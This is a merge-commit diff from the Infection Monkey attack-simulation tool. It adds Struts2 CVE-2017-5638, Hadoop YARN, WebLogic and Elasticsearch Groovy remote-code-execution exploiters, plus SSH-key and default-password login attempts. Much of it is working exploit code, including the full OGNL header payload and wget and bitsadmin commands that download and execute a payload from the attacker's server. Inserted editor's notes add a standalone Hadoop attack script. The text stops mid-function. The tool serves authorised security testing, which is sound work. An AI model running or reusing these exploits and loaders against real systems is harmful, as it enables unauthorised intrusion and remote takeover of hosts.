Merge branch 'develop' of https://github.com/guardicore/monkey into develop

# Conflicts:
#	infection_monkey/model/__init__.py
#	monkey_island/cc/ui/package-lock.json
VakarisZ committed 2018-09-13 12:50:09 +03:00
commit 33c4a93ad7
75 changed files with 13555 additions and 6851 deletions

View File

@@ -4,6 +4,7 @@ import struct
 from abc import ABCMeta, abstractmethod
 import ipaddress
+from six import text_type

 __author__ = 'itamar'
@@ -65,7 +66,7 @@ class CidrRange(NetworkRange):
     def __init__(self, cidr_range, shuffle=True):
         super(CidrRange, self).__init__(shuffle=shuffle)
         self._cidr_range = cidr_range.strip()
-        self._ip_network = ipaddress.ip_network(unicode(self._cidr_range), strict=False)
+        self._ip_network = ipaddress.ip_network(text_type(self._cidr_range), strict=False)

     def __repr__(self):
         return "<CidrRange %s>" % (self._cidr_range,)

View File

@@ -7,8 +7,9 @@ from abc import ABCMeta
 from itertools import product

-from exploit import WmiExploiter, Ms08_067_Exploiter, SmbExploiter, RdpExploiter, SSHExploiter, ShellShockExploiter, \
-    SambaCryExploiter, ElasticGroovyExploiter
-from network import TcpScanner, PingScanner, SMBFinger, SSHFinger, HTTPFinger, MySQLFinger, ElasticFinger
+from exploit import WmiExploiter, Ms08_067_Exploiter, SmbExploiter, RdpExploiter, SSHExploiter, ShellShockExploiter, \
+    SambaCryExploiter, ElasticGroovyExploiter, Struts2Exploiter, WebLogicExploiter, HadoopExploiter
+from network import TcpScanner, PingScanner, SMBFinger, SSHFinger, HTTPFinger, MySQLFinger, ElasticFinger, \
+    MSSQLFinger

 __author__ = 'itamar'
@@ -40,7 +41,7 @@ def _cast_by_example(value, example):
         return int(value)
     elif example_type is float:
         return float(value)
-    elif example_type is types.ClassType or example_type is ABCMeta:
+    elif example_type in (type, ABCMeta):
         return globals()[value]
     else:
         return None
@@ -84,10 +85,10 @@ class Configuration(object):
             if val_type is types.FunctionType or val_type is types.MethodType:
                 continue
-            if val_type is types.ClassType or val_type is ABCMeta:
+            if val_type in (type, ABCMeta):
                 value = value.__name__
             elif val_type is tuple or val_type is list:
-                if len(value) != 0 and (type(value[0]) is types.ClassType or type(value[0]) is ABCMeta):
+                if len(value) != 0 and type(value[0]) in (type, ABCMeta):
                     value = val_type([x.__name__ for x in value])
             result[key] = value
@@ -145,10 +146,10 @@ class Configuration(object):
     max_iterations = 1

     scanner_class = TcpScanner
-    finger_classes = [SMBFinger, SSHFinger, PingScanner, HTTPFinger, MySQLFinger, ElasticFinger]
+    finger_classes = [SMBFinger, SSHFinger, PingScanner, HTTPFinger, MySQLFinger, ElasticFinger, MSSQLFinger]
     exploiter_classes = [SmbExploiter, WmiExploiter,  # Windows exploits
                          SSHExploiter, ShellShockExploiter, SambaCryExploiter,  # Linux
-                         ElasticGroovyExploiter,  # multi
+                         ElasticGroovyExploiter, Struts2Exploiter, WebLogicExploiter, HadoopExploiter  # multi
                          ]

     # how many victims to look for in a single scan iteration
@@ -163,7 +164,7 @@ class Configuration(object):
     # Configuration servers to try to connect to, in this order.
     command_servers = [
-        "41.50.73.31:5000"
+        "192.0.2.0:5000"
     ]

     # sets whether or not to locally save the running configuration after finishing
@@ -184,13 +185,15 @@ class Configuration(object):
     # Auto detect and scan local subnets
     local_network_scan = True

-    subnet_scan_list = ['', ]
+    subnet_scan_list = []
+    inaccessible_subnets = []

-    blocked_ips = ['', ]
+    blocked_ips = []

     # TCP Scanner
     HTTP_PORTS = [80, 8080, 443,
                   8008,  # HTTP alternate
+                  7001  # Oracle Weblogic default server port
                   ]
     tcp_target_ports = [22,
                         2222,
@@ -233,6 +236,12 @@ class Configuration(object):
         """
         return product(self.exploit_user_list, self.exploit_password_list)

+    def get_exploit_user_ssh_key_pairs(self):
+        """
+        :return: All combinations of the configurations users and ssh pairs
+        """
+        return product(self.exploit_user_list, self.exploit_ssh_keys)
+
     def get_exploit_user_password_or_hash_product(self):
         """
         Returns all combinations of the configurations users and passwords or lm/ntlm hashes
@@ -251,6 +260,7 @@ class Configuration(object):
     exploit_password_list = ["Password1!", "1234", "password", "12345678"]
     exploit_lm_hash_list = []
     exploit_ntlm_hash_list = []
+    exploit_ssh_keys = []

     # smb/wmi exploiter
     smb_download_timeout = 300  # timeout in seconds
@@ -265,13 +275,12 @@ class Configuration(object):
     # system info collection
     collect_system_info = True
+    should_use_mimikatz = True

     ###########################
     # systeminfo config
     ###########################

-    mimikatz_dll_name = "mk.dll"
     extract_azure_creds = True

View File

@@ -9,6 +9,7 @@ import sys
 import time
 from ctypes import c_char_p

+import filecmp
 from config import WormConfiguration
 from exploit.tools import build_monkey_commandline_explicitly
 from model import MONKEY_CMDLINE_WINDOWS, MONKEY_CMDLINE_LINUX, GENERAL_CMDLINE_LINUX
@@ -56,7 +57,10 @@ class MonkeyDrops(object):
             return False

         # we copy/move only in case path is different
-        file_moved = os.path.samefile(self._config['source_path'], self._config['destination_path'])
+        try:
+            file_moved = filecmp.cmp(self._config['source_path'], self._config['destination_path'])
+        except OSError:
+            file_moved = False

         if not file_moved and os.path.exists(self._config['destination_path']):
             os.remove(self._config['destination_path'])
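Editor's note: the switch from os.path.samefile to filecmp.cmp changes the check from "same file on disk" to "same contents", and the try/except covers the case where the destination does not exist yet. A minimal sketch of the difference, with made-up paths:

import filecmp
import os
import shutil

src, dst = "/tmp/monkey-src.bin", "/tmp/monkey-dst.bin"  # hypothetical paths
with open(src, "wb") as f:
    f.write(b"payload")
shutil.copy(src, dst)

# samefile: True only if both names point to the same file (same inode)
print(os.path.samefile(src, dst))   # False - two separate files
# cmp: True if the contents match, even for two distinct files
print(filecmp.cmp(src, dst))        # True - identical bytes

os.remove(dst)
# cmp raises OSError when one side is missing, hence the try/except above
try:
    filecmp.cmp(src, dst)
except OSError:
    print("destination missing")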

View File

@@ -1,17 +1,18 @@
 {
     "command_servers": [
-        "41.50.73.31:5000"
+        "192.0.2.0:5000"
     ],
     "internet_services": [
         "monkey.guardicore.com",
         "www.google.com"
     ],
     "keep_tunnel_open_time": 60,
     "subnet_scan_list": [
-        ""
     ],
-    "blocked_ips": [""],
-    "current_server": "41.50.73.31:5000",
+    "inaccessible_subnets": [],
+    "blocked_ips": [],
+    "current_server": "192.0.2.0:5000",
     "alive": true,
     "collect_system_info": true,
     "extract_azure_creds": true,
@@ -37,14 +38,18 @@
         "ShellShockExploiter",
         "ElasticGroovyExploiter",
         "SambaCryExploiter",
+        "Struts2Exploiter",
+        "WebLogicExploiter",
+        "HadoopExploiter"
     ],
     "finger_classes": [
         "SSHFinger",
         "PingScanner",
         "HTTPFinger",
         "SMBFinger",
-        "MySQLFinger"
-        "ElasticFinger",
+        "MySQLFinger",
+        "MSSQLFingerprint",
+        "ElasticFinger"
     ],
     "max_iterations": 3,
     "monkey_log_path_windows": "%temp%\\~df1563.tmp",
@@ -67,6 +72,7 @@
     "exploit_password_list": [],
     "exploit_lm_hash_list": [],
     "exploit_ntlm_hash_list": [],
+    "exploit_ssh_keys": [],
     "sambacry_trigger_timeout": 5,
     "sambacry_folder_paths_to_guess": ["", "/mnt", "/tmp", "/storage", "/export", "/share", "/shares", "/home"],
     "sambacry_shares_not_to_check": ["IPC$", "print$"],
@@ -84,7 +90,8 @@
         443,
         3306,
         8008,
-        9200
+        9200,
+        7001
     ],
     "timeout_between_iterations": 10,
     "use_file_logging": true,

View File

@@ -24,9 +24,9 @@ class HostExploiter(object):
             {'result': result, 'machine': self.host.__dict__, 'exploiter': self.__class__.__name__,
              'info': self._exploit_info, 'attempts': self._exploit_attempts})

-    def report_login_attempt(self, result, user, password, lm_hash='', ntlm_hash=''):
+    def report_login_attempt(self, result, user, password='', lm_hash='', ntlm_hash='', ssh_key=''):
         self._exploit_attempts.append({'result': result, 'user': user, 'password': password,
-                                       'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash})
+                                       'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash, 'ssh_key': ssh_key})

     @abstractmethod
     def exploit_host(self):
@@ -41,3 +41,6 @@ from sshexec import SSHExploiter
 from shellshock import ShellShockExploiter
 from sambacry import SambaCryExploiter
 from elasticgroovy import ElasticGroovyExploiter
+from struts2 import Struts2Exploiter
+from weblogic import WebLogicExploiter
+from hadoop import HadoopExploiter

View File

@@ -6,225 +6,52 @@
 import json
 import logging

 import requests

-from exploit import HostExploiter
-from model import DROPPER_ARG
-from network.elasticfinger import ES_SERVICE, ES_PORT
-from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth
+from exploit.web_rce import WebRCE
+from model import WGET_HTTP_UPLOAD, RDP_CMDLINE_HTTP
+from network.elasticfinger import ES_PORT, ES_SERVICE
+import re

-__author__ = 'danielg'
+__author__ = 'danielg, VakarisZ'

 LOG = logging.getLogger(__name__)


-class ElasticGroovyExploiter(HostExploiter):
+class ElasticGroovyExploiter(WebRCE):
     # attack URLs
-    BASE_URL = 'http://%s:%s/_search?pretty'
     MONKEY_RESULT_FIELD = "monkey_result"
     GENERIC_QUERY = '''{"size":1, "script_fields":{"%s": {"script": "%%s"}}}''' % MONKEY_RESULT_FIELD
-    JAVA_IS_VULNERABLE = GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.Runtime\\")'
-    JAVA_GET_TMP_DIR = \
-        GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.System\\").getProperty(\\"java.io.tmpdir\\")'
-    JAVA_GET_OS = GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.System\\").getProperty(\\"os.name\\")'
     JAVA_CMD = GENERIC_QUERY \
                % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
-    JAVA_GET_BIT_LINUX = JAVA_CMD % '/bin/uname -m'
-    DOWNLOAD_TIMEOUT = 300  # copied from rdpgrinder

     _TARGET_OS_TYPE = ['linux', 'windows']

     def __init__(self, host):
         super(ElasticGroovyExploiter, self).__init__(host)
-        self._config = __import__('config').WormConfiguration
-        self.skip_exist = self._config.skip_exploit_if_file_exist

-    def is_os_supported(self):
-        """
-        Checks if the host is vulnerable.
-        Either using version string or by trying to attack
-        :return:
-        """
-        if not super(ElasticGroovyExploiter, self).is_os_supported():
-            return False
-        if ES_SERVICE not in self.host.services:
-            LOG.info("Host: %s doesn't have ES open" % self.host.ip_addr)
-            return False
-        major, minor, build = self.host.services[ES_SERVICE]['version'].split('.')
-        major = int(major)
-        minor = int(minor)
-        build = int(build)
-        if major > 1:
-            return False
-        if major == 1 and minor > 4:
-            return False
-        if major == 1 and minor == 4 and build > 2:
-            return False
-        return self.is_vulnerable()
-
-    def exploit_host(self):
-        real_host_os = self.get_host_os()
-        self.host.os['type'] = str(real_host_os.lower())  # strip unicode characters
-        if 'linux' in self.host.os['type']:
-            return self.exploit_host_linux()
-        else:
-            return self.exploit_host_windows()
-
-    def exploit_host_windows(self):
-        """
-        TODO
-        Will exploit windows similar to smbexec
-        :return:
-        """
-        return False
-
-    def exploit_host_linux(self):
-        """
-        Exploits linux using similar flow to sshexec and shellshock.
-        Meaning run remote commands to copy files over HTTP
-        :return:
-        """
-        uname_machine = str(self.get_linux_arch())
-        if len(uname_machine) != 0:
-            self.host.os['machine'] = str(uname_machine.lower().strip())  # strip unicode characters
-        dropper_target_path_linux = self._config.dropper_target_path_linux
-        if self.skip_exist and (self.check_if_remote_file_exists_linux(dropper_target_path_linux)):
-            LOG.info("Host %s was already infected under the current configuration, done" % self.host)
-            return True  # return already infected
-        src_path = get_target_monkey(self.host)
-        if not src_path:
-            LOG.info("Can't find suitable monkey executable for host %r", self.host)
-            return False
-        if not self.download_file_in_linux(src_path, target_path=dropper_target_path_linux):
-            return False
-        self.set_file_executable_linux(dropper_target_path_linux)
-        self.run_monkey_linux(dropper_target_path_linux)
-        if not (self.check_if_remote_file_exists_linux(self._config.monkey_log_path_linux)):
-            LOG.info("Log file does not exist, monkey might not have run")
-        return True
-
-    def run_monkey_linux(self, dropper_target_path_linux):
-        """
-        Runs the monkey
-        """
-        cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG)
-        cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1, location=dropper_target_path_linux)
-        cmdline += ' & '
-        self.run_shell_command(cmdline)
-        LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
-                 self._config.dropper_target_path_linux, self.host, cmdline)
-        if not (self.check_if_remote_file_exists_linux(self._config.dropper_log_path_linux)):
-            LOG.info("Log file does not exist, monkey might not have run")
-
-    def download_file_in_linux(self, src_path, target_path):
-        """
-        Downloads a file in target machine using curl to the given target path
-        :param src_path: File path relative to the monkey
-        :param target_path: Target path in linux victim
-        :return: T/F
-        """
-        http_path, http_thread = HTTPTools.create_transfer(self.host, src_path)
-        if not http_path:
-            LOG.debug("Exploiter %s failed, http transfer creation failed." % self.__name__)
-            return False
-        download_command = '/usr/bin/curl %s -o %s' % (
-            http_path, target_path)
-        self.run_shell_command(download_command)
-        http_thread.join(self.DOWNLOAD_TIMEOUT)
-        http_thread.stop()
-        if (http_thread.downloads != 1) or (
-                'ELF' not in
-                self.check_if_remote_file_exists_linux(target_path)):
-            LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
-            return False
-        return True
-
-    def set_file_executable_linux(self, file_path):
-        """
-        Marks the given file as executable using chmod
-        :return: Nothing
-        """
-        chmod = '/bin/chmod +x %s' % file_path
-        self.run_shell_command(chmod)
-        LOG.info("Marked file %s on host %s as executable", file_path, self.host)
-
-    def check_if_remote_file_exists_linux(self, file_path):
-        """
-        :return:
-        """
-        cmdline = '/usr/bin/head -c 4 %s' % file_path
-        return self.run_shell_command(cmdline)
-
-    def run_shell_command(self, command):
-        """
-        Runs a single shell command and returns the result.
-        """
-        payload = self.JAVA_CMD % command
-        result = self.get_command_result(payload)
-        LOG.info("Ran the command %s on host %s", command, self.host)
-        return result
-
-    def get_linux_arch(self):
-        """
-        Returns host as per uname -m
-        """
-        return self.get_command_result(self.JAVA_GET_BIT_LINUX)
-
-    def get_host_tempdir(self):
-        """
-        Returns where to write our file given our permissions
-        :return: Temp directory path in target host
-        """
-        return self.get_command_result(self.JAVA_GET_TMP_DIR)
-
-    def get_host_os(self):
-        """
-        :return: target OS
-        """
-        return self.get_command_result(self.JAVA_GET_OS)
-
-    def is_vulnerable(self):
-        """
-        Checks if a given elasticsearch host is vulnerable to the groovy attack
-        :return: True/False
-        """
-        result_text = self.get_command_result(self.JAVA_IS_VULNERABLE)
-        return 'java.lang.Runtime' in result_text
-
-    def get_command_result(self, payload):
-        """
-        Gets the result of an attack payload with a single return value.
-        :param payload: Payload that fits the GENERIC_QUERY template.
-        """
-        result = self.attack_query(payload)
-        if not result:  # not vulnerable
-            return ""
-        return result[0]
-
-    def attack_query(self, payload):
-        """
-        Wraps the requests query and the JSON parsing.
-        Just reduce opportunity for bugs
-        :return: List of data fields or None
-        """
-        response = requests.get(self.attack_url(), data=payload)
-        result = self.get_results(response)
-        return result
-
-    def attack_url(self):
-        """
-        Composes the URL to attack per host IP and port.
-        :return: Elasticsearch vulnerable URL
-        """
-        return self.BASE_URL % (self.host.ip_addr, ES_PORT)
+    def get_exploit_config(self):
+        exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config()
+        exploit_config['dropper'] = True
+        exploit_config['url_extensions'] = ['_search?pretty']
+        exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': RDP_CMDLINE_HTTP}
+        return exploit_config
+
+    def get_open_service_ports(self, port_list, names):
+        # We must append elastic port we get from elastic fingerprint module because It's not marked as 'http' service
+        valid_ports = super(ElasticGroovyExploiter, self).get_open_service_ports(port_list, names)
+        if ES_SERVICE in self.host.services:
+            valid_ports.append([ES_PORT, False])
+        return valid_ports
+
+    def exploit(self, url, command):
+        command = re.sub(r"\\", r"\\\\\\\\", command)
+        payload = self.JAVA_CMD % command
+        response = requests.get(url, data=payload)
+        result = self.get_results(response)
+        if not result:
+            return False
+        return result[0]

     def get_results(self, response):
         """

View File

@@ -0,0 +1,100 @@
"""
Remote code execution on HADOOP server with YARN and default settings
Implementation is based on code from https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn
"""

import requests
import json
import random
import string
import logging

from exploit.web_rce import WebRCE
from tools import HTTPTools, build_monkey_commandline, get_monkey_depth
import posixpath
from model import MONKEY_ARG, ID_STRING

__author__ = 'VakarisZ'

LOG = logging.getLogger(__name__)


class HadoopExploiter(WebRCE):
    _TARGET_OS_TYPE = ['linux', 'windows']
    HADOOP_PORTS = [["8088", False]]
    # We need to prevent from downloading if monkey already exists because hadoop uses multiple threads/nodes
    # to download monkey at the same time
    LINUX_COMMAND = "! [ -f %(monkey_path)s ] " \
                    "&& wget -O %(monkey_path)s %(http_path)s " \
                    "; chmod +x %(monkey_path)s " \
                    "&& %(monkey_path)s %(monkey_type)s %(parameters)s"
    WINDOWS_COMMAND = "cmd /c if NOT exist %(monkey_path)s bitsadmin /transfer" \
                      " Update /download /priority high %(http_path)s %(monkey_path)s " \
                      "& %(monkey_path)s %(monkey_type)s %(parameters)s"
    # How long we have our http server open for downloads in seconds
    DOWNLOAD_TIMEOUT = 60
    # Random string's length that's used for creating unique app name
    RAN_STR_LEN = 6

    def __init__(self, host):
        super(HadoopExploiter, self).__init__(host)

    def exploit_host(self):
        # Try to get exploitable url
        urls = self.build_potential_urls(self.HADOOP_PORTS)
        self.add_vulnerable_urls(urls, True)
        if not self.vulnerable_urls:
            return False
        paths = self.get_monkey_paths()
        if not paths:
            return False
        http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths['src_path'])
        command = self.build_command(paths['dest_path'], http_path)
        if not self.exploit(self.vulnerable_urls[0], command):
            return False
        http_thread.join(self.DOWNLOAD_TIMEOUT)
        http_thread.stop()
        return True

    def exploit(self, url, command):
        # Get the newly created application id
        resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/new-application"))
        resp = json.loads(resp.content)
        app_id = resp['application-id']
        # Create a random name for our application in YARN
        rand_name = ID_STRING + "".join([random.choice(string.ascii_lowercase) for _ in xrange(self.RAN_STR_LEN)])
        payload = self.build_payload(app_id, rand_name, command)
        resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/"), json=payload)
        return resp.status_code == 202

    def check_if_exploitable(self, url):
        try:
            resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/new-application"))
        except requests.ConnectionError:
            return False
        return resp.status_code == 200

    def build_command(self, path, http_path):
        # Build command to execute
        monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1)
        if 'linux' in self.host.os['type']:
            base_command = self.LINUX_COMMAND
        else:
            base_command = self.WINDOWS_COMMAND
        return base_command % {"monkey_path": path, "http_path": http_path,
                               "monkey_type": MONKEY_ARG, "parameters": monkey_cmd}

    @staticmethod
    def build_payload(app_id, name, command):
        payload = {
            "application-id": app_id,
            "application-name": name,
            "am-container-spec": {
                "commands": {
                    "command": command,
                }
            },
            "application-type": "YARN"
        }
        return payload
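Editor's note: the unauthenticated ResourceManager REST flow that exploit() drives above boils down to two HTTP calls; the sketch below reproduces it standalone (the target URL and the echoed command are placeholders, not values from the commit):

import json
import posixpath
import requests

RM_URL = "http://192.0.2.10:8088"  # hypothetical YARN ResourceManager

# Step 1: ask the ResourceManager for a fresh application id (no auth is required
# on a default-configured cluster, which is what the exploiter relies on).
resp = requests.post(posixpath.join(RM_URL, "ws/v1/cluster/apps/new-application"))
app_id = json.loads(resp.content)['application-id']

# Step 2: submit an application whose container command is the payload;
# a 202 response means YARN accepted it for scheduling.
submission = {
    "application-id": app_id,
    "application-name": "demo-app",
    "am-container-spec": {"commands": {"command": "echo hello"}},
    "application-type": "YARN",
}
resp = requests.post(posixpath.join(RM_URL, "ws/v1/cluster/apps/"), json=submission)
print(resp.status_code)  # 202 when the submission is accepted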

View File

@@ -27,7 +27,7 @@ LOG = getLogger(__name__)


 def twisted_log_func(*message, **kw):
-    if kw.has_key('isError') and kw['isError']:
+    if kw.get('isError'):
         error_msg = 'Unknown'
         if 'failure' in kw:
             error_msg = kw['failure'].getErrorMessage()

View File

@@ -19,7 +19,8 @@ import monkeyfs
 from exploit import HostExploiter
 from model import DROPPER_ARG
 from network.smbfinger import SMB_SERVICE
-from tools import build_monkey_commandline, get_target_monkey_by_os, get_binaries_dir_path, get_monkey_depth
+from tools import build_monkey_commandline, get_target_monkey_by_os, get_monkey_depth
+from pyinstaller_utils import get_binary_file_path

 __author__ = 'itay.mizeretz'
@@ -306,9 +307,9 @@ class SambaCryExploiter(HostExploiter):
     def get_monkey_runner_bin_file(self, is_32bit):
         if is_32bit:
-            return open(path.join(get_binaries_dir_path(), self.SAMBACRY_RUNNER_FILENAME_32), "rb")
+            return open(get_binary_file_path(self.SAMBACRY_RUNNER_FILENAME_32), "rb")
         else:
-            return open(path.join(get_binaries_dir_path(), self.SAMBACRY_RUNNER_FILENAME_64), "rb")
+            return open(get_binary_file_path(self.SAMBACRY_RUNNER_FILENAME_64), "rb")

     def get_monkey_commandline_file(self, location):
         return BytesIO(DROPPER_ARG + build_monkey_commandline(self.host, get_monkey_depth() - 1, location))

View File

@@ -8,7 +8,7 @@ import requests

 from exploit import HostExploiter
 from exploit.tools import get_target_monkey, HTTPTools, get_monkey_depth
-from model import MONKEY_ARG
+from model import DROPPER_ARG
 from shellshock_resources import CGI_FILES
 from tools import build_monkey_commandline
@@ -133,7 +133,7 @@ class ShellShockExploiter(HostExploiter):
         self.attack_page(url, header, run_path)

         # run the monkey
-        cmdline = "%s %s" % (dropper_target_path_linux, MONKEY_ARG)
+        cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG)
         cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1) + ' & '
         run_path = exploit + cmdline
         self.attack_page(url, header, run_path)

View File

@@ -2,6 +2,7 @@ import logging
 import time

 import paramiko
+import StringIO

 import monkeyfs
 from exploit import HostExploiter
@@ -31,6 +32,65 @@ class SSHExploiter(HostExploiter):
         LOG.debug("SFTP transferred: %d bytes, total: %d bytes", transferred, total)
         self._update_timestamp = time.time()

+    def exploit_with_ssh_keys(self, port, ssh):
+        user_ssh_key_pairs = self._config.get_exploit_user_ssh_key_pairs()
+
+        exploited = False
+        for user, ssh_key_pair in user_ssh_key_pairs:
+            # Creating file-like private key for paramiko
+            pkey = StringIO.StringIO(ssh_key_pair['private_key'])
+            ssh_string = "%s@%s" % (ssh_key_pair['user'], ssh_key_pair['ip'])
+            try:
+                pkey = paramiko.RSAKey.from_private_key(pkey)
+            except(IOError, paramiko.SSHException, paramiko.PasswordRequiredException):
+                LOG.error("Failed reading ssh key")
+            try:
+                ssh.connect(self.host.ip_addr,
+                            username=user,
+                            pkey=pkey,
+                            port=port,
+                            timeout=None)
+                LOG.debug("Successfully logged in %s using %s users private key",
+                          self.host, ssh_string)
+                exploited = True
+                self.report_login_attempt(True, user, ssh_key=ssh_string)
+                break
+            except Exception as exc:
+                LOG.debug("Error logging into victim %r with %s"
+                          " private key", self.host,
+                          ssh_string)
+                self.report_login_attempt(False, user, ssh_key=ssh_string)
+                continue
+        return exploited
+
+    def exploit_with_login_creds(self, port, ssh):
+        user_password_pairs = self._config.get_exploit_user_password_pairs()
+
+        exploited = False
+        for user, curpass in user_password_pairs:
+            try:
+                ssh.connect(self.host.ip_addr,
+                            username=user,
+                            password=curpass,
+                            port=port,
+                            timeout=None)
+                LOG.debug("Successfully logged in %r using SSH (%s : %s)",
+                          self.host, user, curpass)
+                exploited = True
+                self.report_login_attempt(True, user, curpass)
+                break
+            except Exception as exc:
+                LOG.debug("Error logging into victim %r with user"
+                          " %s and password '%s': (%s)", self.host,
+                          user, curpass, exc)
+                self.report_login_attempt(False, user, curpass)
+                continue
+        return exploited
+
     def exploit_host(self):
         ssh = paramiko.SSHClient()
         ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
@@ -46,29 +106,10 @@ class SSHExploiter(HostExploiter):
             LOG.info("SSH port is closed on %r, skipping", self.host)
             return False

-        user_password_pairs = self._config.get_exploit_user_password_pairs()
-
-        exploited = False
-        for user, curpass in user_password_pairs:
-            try:
-                ssh.connect(self.host.ip_addr,
-                            username=user,
-                            password=curpass,
-                            port=port,
-                            timeout=None)
-                LOG.debug("Successfully logged in %r using SSH (%s : %s)",
-                          self.host, user, curpass)
-                self.report_login_attempt(True, user, curpass)
-                exploited = True
-                break
-            except Exception as exc:
-                LOG.debug("Error logging into victim %r with user"
-                          " %s and password '%s': (%s)", self.host,
-                          user, curpass, exc)
-                self.report_login_attempt(False, user, curpass)
-                continue
+        # Check for possible ssh exploits
+        exploited = self.exploit_with_ssh_keys(port, ssh)
+        if not exploited:
+            exploited = self.exploit_with_login_creds(port, ssh)

         if not exploited:
             LOG.debug("Exploiter SSHExploiter is giving up...")

View File

@@ -0,0 +1,94 @@
"""
Implementation is based on Struts2 jakarta multiparser RCE exploit ( CVE-2017-5638 )
code used is from https://www.exploit-db.com/exploits/41570/
Vulnerable struts2 versions <=2.3.31 and <=2.5.10
"""

import urllib2
import httplib
import unicodedata
import re
import logging

from web_rce import WebRCE

__author__ = "VakarisZ"

LOG = logging.getLogger(__name__)

DOWNLOAD_TIMEOUT = 300


class Struts2Exploiter(WebRCE):
    _TARGET_OS_TYPE = ['linux', 'windows']

    def __init__(self, host):
        super(Struts2Exploiter, self).__init__(host, None)

    def get_exploit_config(self):
        exploit_config = super(Struts2Exploiter, self).get_exploit_config()
        exploit_config['dropper'] = True
        return exploit_config

    def build_potential_urls(self, ports, extensions=None):
        """
        We need to override this method to get redirected url's
        :param ports: Array of ports. One port is described as size 2 array: [port.no(int), isHTTPS?(bool)]
        Eg. ports: [[80, False], [443, True]]
        :param extensions: What subdirectories to scan. www.domain.com[/extension]
        :return: Array of url's to try and attack
        """
        url_list = super(Struts2Exploiter, self).build_potential_urls(ports)
        url_list = [self.get_redirected(url) for url in url_list]
        return url_list

    @staticmethod
    def get_redirected(url):
        # Returns false if url is not right
        headers = {'User-Agent': 'Mozilla/5.0'}
        request = urllib2.Request(url, headers=headers)
        try:
            return urllib2.urlopen(request).geturl()
        except urllib2.URLError:
            LOG.error("Can't reach struts2 server")
            return False

    def exploit(self, url, cmd):
        """
        :param url: Full url to send request to
        :param cmd: Code to try and execute on host
        :return: response
        """
        cmd = re.sub(r"\\", r"\\\\", cmd)
        cmd = re.sub(r"'", r"\\'", cmd)
        payload = "%%{(#_='multipart/form-data')." \
                  "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
                  "(#_memberAccess?" \
                  "(#_memberAccess=#dm):" \
                  "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." \
                  "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." \
                  "(#ognlUtil.getExcludedPackageNames().clear())." \
                  "(#ognlUtil.getExcludedClasses().clear())." \
                  "(#context.setMemberAccess(#dm))))." \
                  "(#cmd='%s')." \
                  "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." \
                  "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \
                  "(#p=new java.lang.ProcessBuilder(#cmds))." \
                  "(#p.redirectErrorStream(true)).(#process=#p.start())." \
                  "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." \
                  "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." \
                  "(#ros.flush())}" % cmd
        # Turns payload ascii just for consistency
        if isinstance(payload, unicode):
            payload = unicodedata.normalize('NFKD', payload).encode('ascii', 'ignore')
        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
        try:
            request = urllib2.Request(url, headers=headers)
            # Timeout added or else we would wait for all monkeys' output
            page = urllib2.urlopen(request).read()
        except AttributeError:
            # If url does not exist
            return False
        except httplib.IncompleteRead as e:
            page = e.partial
        return page
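Editor's note: two details in exploit() above are easy to miss: the command is escaped before being spliced into the OGNL expression, and the finished payload is sent as the Content-Type header, which the vulnerable Jakarta multipart parser evaluates (CVE-2017-5638). A small sketch of just those two steps, with a made-up command and URL (the request is built but not sent):

import re
import urllib2

cmd = "echo 'C:\\monkey.exe'"        # sample command with a quote and a backslash
cmd = re.sub(r"\\", r"\\\\", cmd)    # double every backslash: \ -> \\
cmd = re.sub(r"'", r"\\'", cmd)      # escape single quotes:   ' -> \'
print(cmd)                           # echo \'C:\\monkey.exe\'

ognl_payload = "%{... (#cmd='" + cmd + "') ...}"   # stands in for the full expression above
request = urllib2.Request("http://192.0.2.20:8080/",          # hypothetical target
                          headers={'User-Agent': 'Mozilla/5.0',
                                   'Content-Type': ognl_payload})  # payload rides in the header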

View File

@@ -21,7 +21,8 @@ import monkeyfs
 from network import local_ips
 from network.firewall import app as firewall
 from network.info import get_free_tcp_port, get_routes
-from transport import HTTPServer
+from transport import HTTPServer, LockedHTTPServer
+from threading import Lock


 class DceRpcException(Exception):
@@ -386,6 +387,34 @@ class HTTPTools(object):
         return "http://%s:%s/%s" % (local_ip, local_port, urllib.quote(os.path.basename(src_path))), httpd

+    @staticmethod
+    def create_locked_transfer(host, src_path, local_ip=None, local_port=None):
+        """
+        Create http server for file transfer with a lock
+        :param host: Variable with target's information
+        :param src_path: Monkey's path on current system
+        :param local_ip: IP where to host server
+        :param local_port: Port at which to host monkey's download
+        :return: Server address in http://%s:%s/%s format and LockedHTTPServer handler
+        """
+        # To avoid race conditions we pass a locked lock to http servers thread
+        lock = Lock()
+        lock.acquire()
+
+        if not local_port:
+            local_port = get_free_tcp_port()
+
+        if not local_ip:
+            local_ip = get_interface_to_target(host.ip_addr)
+
+        if not firewall.listen_allowed():
+            LOG.error("Firewall is not allowed to listen for incomming ports. Aborting")
+            return None, None
+
